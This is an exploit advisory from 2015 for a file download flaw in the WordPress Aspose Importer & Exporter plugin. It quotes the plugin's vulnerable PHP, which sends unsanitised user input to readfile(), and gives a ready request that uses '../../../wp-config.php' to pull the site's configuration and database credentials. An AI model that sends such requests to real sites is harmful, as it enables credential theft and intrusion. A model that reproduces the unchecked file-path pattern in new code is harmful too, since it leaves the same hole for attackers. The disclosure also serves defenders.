#########################################

Exploit Title : Wordpress Aspose Importer & Exporter v1.0 Plugin File  
Download Vulnerability

Exploit Author : Ashiyane Digital Security Team

Vendor Homepage: https://wordpress.org/plugins/aspose-importer-exporter/

Download Link :  
https://downloads.wordpress.org/plugin/aspose-importer-exporter.2.0.zip

Date : 28 / 3 / 2015

Tested On : windows 8.1 + linux Kali

#########################################
#########################################

~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>

Exploit:
Vulnerable file :  
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download

~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~>

Vulnerable Code :

<?php

if(isset($_GET['file'])) {

     $file = $_GET['file'];

     $file_arr = explode('/',$file);

     $file_name = $file_arr[count($file_arr) - 1];

     header ("Content-type: octet/stream");

     header ("Content-disposition: attachment; filename=".$file_name.";");

     header("Content-Length: ".filesize($file));

     readfile($file);

     exit;

}

http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=[File  
Address]

Examples :  
http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php

#########################################
#########################################

Discovered by : Rq07

#########################################